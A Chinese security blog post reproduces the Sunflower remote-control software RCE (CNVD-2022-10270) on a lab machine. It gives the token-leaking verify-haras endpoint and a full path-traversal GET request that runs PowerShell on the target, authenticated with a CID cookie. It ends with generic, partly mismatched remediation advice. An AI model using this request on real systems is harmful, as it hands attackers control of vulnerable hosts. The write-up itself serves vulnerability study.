向日葵远程代码执行(CNVD-2022-10270)漏洞复现

admin 2024年11月9日21:41:39评论25 views字数 955阅读3分11秒阅读模式

0x01 描述

上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),安装以下存在windwos问题版本的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。

0x02 影响范围

向日葵个人版   for Windows <= 11.0.0.33向日葵简约版   <= V1.0.1.433152021.12

0x03 漏洞复现

在靶机安装此漏洞版本内的向日葵(靶机IP:192.168.10.184)

向日葵远程代码执行(CNVD-2022-10270)漏洞复现工具复现

向日葵远程代码执行(CNVD-2022-10270)漏洞复现

cmd提示红色就是证明该漏洞

向日葵远程代码执行(CNVD-2022-10270)漏洞复现

对该端口漏洞进行利用

向日葵远程代码执行(CNVD-2022-10270)漏洞复现

向日葵远程代码执行(CNVD-2022-10270)漏洞复现

网页复现

也可以利用python脚本去ping全部端口加上"/cgi-bin/rpc?action=verify-haras"然后将200网页状态码进行记录返回。

然后访问http://192.168.10.184:50043/cgi-bin/rpc?action=verify-haras

此页面说明漏洞存在向日葵远程代码执行(CNVD-2022-10270)漏洞复现

再去将verify_string的值提取出来,去构造GET请求

http://192.168.10.184:50043/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami

Cookie是CID="verify_string的值"

向日葵远程代码执行(CNVD-2022-10270)漏洞复现

向日葵远程代码执行(CNVD-2022-10270)漏洞复现

0x04 修复建议(百度)

向日葵漏洞防护为大家找到的解决远程代码执行漏洞的方法有:

1. 输入检查:应用程序必须实现输入检查机制,将所有从外部接收的数据都进行严格的检查和过滤,防止恶意代码被注入。

2. 参数化查询:采用参数化查询可以防止攻击者通过利用应用程序的注入漏洞来修改查询语句,实现任意代码执行的攻击。

3. 输出编码:在输出时对敏感字符进行编码保护,比如HTML编码,防止恶意代码直接输出执行。

4. 使用最 新的安全防护措施:保证服务器系统和应用程序的所有组件、库和插件都是最 新的,确保已知的漏洞都得到修复。

5. 强制访问控制:应该设置访问控制机制,确保恶意用户无法访问敏感数据和代码。

原文始发于微信公众号(海底生残月):向日葵远程代码执行(CNVD-2022-10270)漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月9日21:41:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   向日葵远程代码执行(CNVD-2022-10270)漏洞复现https://cn-sec.com/archives/1790330.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息